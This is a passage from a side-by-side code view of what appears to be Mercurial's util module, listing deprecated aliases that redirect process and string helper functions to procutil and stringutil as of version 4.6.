3830 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3831 modname='utils.procutil')
3831 modname='utils.procutil')
3832 except AttributeError:
3832 except AttributeError:
3833 pass
3833 pass
3834 closefds = procutil.closefds
3834 closefds = procutil.closefds
3835 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3835 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3836 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3836 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3837 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3837 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3838 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3838 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3839 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3839 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3840 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3840 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3841 filter = _deprecatedfunc(procutil.filter, '4.6')
3841 filter = _deprecatedfunc(procutil.filter, '4.6')
3842 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3842 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3843 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3843 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3844 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3844 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3845 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3845 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3846 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3846 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3847 system = _deprecatedfunc(procutil.system, '4.6')
3847 system = _deprecatedfunc(procutil.system, '4.6')
3848 gui = _deprecatedfunc(procutil.gui, '4.6')
3848 gui = _deprecatedfunc(procutil.gui, '4.6')
3849 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3849 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3850 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3850 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3851
3851
3852 binary = _deprecatedfunc(stringutil.binary, '4.6')
3852 binary = _deprecatedfunc(stringutil.binary, '4.6')
3853 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3853 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3854 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3854 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3855 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3855 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3856 email = _deprecatedfunc(stringutil.email, '4.6')
3856 email = _deprecatedfunc(stringutil.email, '4.6')
3857 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3857 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3858 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3858 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3859 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3859 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3860 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3860 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3861 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3861 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3862 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3862 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3863 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
3863 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now